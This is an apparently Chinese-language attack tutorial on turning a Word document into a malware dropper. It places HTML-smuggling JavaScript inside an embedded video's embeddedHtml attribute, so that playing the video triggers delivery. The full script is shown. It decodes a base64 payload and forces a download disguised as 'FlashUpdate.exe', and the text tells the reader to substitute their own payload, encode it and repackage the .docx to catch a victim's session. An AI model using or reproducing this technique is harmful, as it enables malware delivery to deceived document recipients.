Word文档嵌入视频

该方法会在文档中嵌入视频,当受害者打开文档播放视频时,会触发HTML走私来交付Payload。

首先,我们需要新建一个Word文档并插入视频:

插入视频后保存文件并重命名为.zip后缀格式后解压:

进入word目录并编辑document.xml文件,其中embeddedHtml属性是嵌入视频的位置:

然后我们编写如下代码进行走私:

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US-x-Hixie" dir="ltr">
<body>
<script>

(function() {

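  /**
   * Decode a base64 string into a Blob.
   *
   * The decoded binary string is copied into Uint8Array chunks of
   * `sliceSize` bytes, so large inputs are never materialised as one
   * giant plain Array before the Blob is assembled.
   *
   * @param {string} base64 - Base64 text (no `data:` URL prefix).
   * @param {string} [mime] - MIME type for the Blob; defaults to ''.
   * @returns {Blob} Blob whose bytes are the decoded input.
   * @throws {DOMException} propagated from atob() when `base64` is not
   *   valid base64.
   */
  function base64ToBlob(base64, mime) {
    mime = mime || '';
    var sliceSize = 1024;
    // Use the global atob rather than window.atob so the helper also
    // resolves in contexts where `window` is not defined (e.g. workers).
    var byteChars = atob(base64);
    var byteArrays = [];

    for (var offset = 0, len = byteChars.length; offset < len; offset += sliceSize) {
      var slice = byteChars.slice(offset, offset + sliceSize);

      // Fill the typed array directly instead of going through an
      // intermediate plain Array of char codes.
      var byteArray = new Uint8Array(slice.length);
      for (var i = 0; i < slice.length; i++) {
        byteArray[i] = slice.charCodeAt(i);
      }

      byteArrays.push(byteArray);
    }

    return new Blob(byteArrays, {type: mime});
  }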

  // Expose base64ToBlob through whichever module system is present:
  // CommonJS first, then AMD, otherwise as a property on `this`
  // (the global object when the IIFE is invoked with `.call(this)`
  // from a classic script).
  var isCommonJs = typeof exports !== 'undefined';
  if (isCommonJs) {
    var hasModuleExports = typeof module !== 'undefined' && module.exports;
    if (hasModuleExports) {
      exports = module.exports = base64ToBlob;
    }
    exports.base64ToBlob = base64ToBlob;
  } else if (typeof define === 'function' && define.amd) {
    define([], function() { return base64ToBlob; });
  } else {
    this.base64ToBlob = base64ToBlob;
  }

}).call(this);
</script>


<script>
    // NOTE(review): the file bytes are carried inline in this script as a
    // base64 literal and assembled in the browser, so at rest they are
    // visible in the embeddedHtml attribute of word/document.xml rather
    // than as a separate fetched resource — presumably the place to
    // inspect when triaging such a document.
    var data = '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'
    // base64ToBlob is defined by the preceding <script> block.
    var blob = base64ToBlob(data, 'application/octet-stream');
    // Legacy IE path: msSaveOrOpenBlob shows the save/open prompt directly.
    // The brace-less if/else below governs exactly one statement each.
    if (navigator.msSaveOrOpenBlob)  // IE hack;
    navigator.msSaveOrOpenBlob(blob, "FlashUpdate.exe");
else
{
    // Other browsers: a blob: object URL on a synthetic <a download>
    // element, clicked programmatically, starts the download without a
    // user gesture. The second argument to createObjectURL is not part
    // of its signature and is ignored; the Blob's own type applies.
    var a = window.document.createElement("a");
    a.href = window.URL.createObjectURL(blob, {type: "application/octet-stream"});
    a.download = "FlashUpdate.exe";
    document.body.appendChild(a);
    a.click();  // IE: "Access is denied";
    document.body.removeChild(a);
}
</script>
</body>
</html>

可以将代码中的Base64编码的Blob替换为自己的payload。

然后对其进行HTML实体编码,可以访问Mothere网站进行编码:

将编码后的内容添加到embeddedHtml属性:

然后在视频链接前加上iframe标签使其能够显示。

最后保存文件,并将所有文件重新压缩为.zip,然后重命名后缀为.docx:

再次打开后,会询问是否信任文档的来源,点击是,即可监听到会话: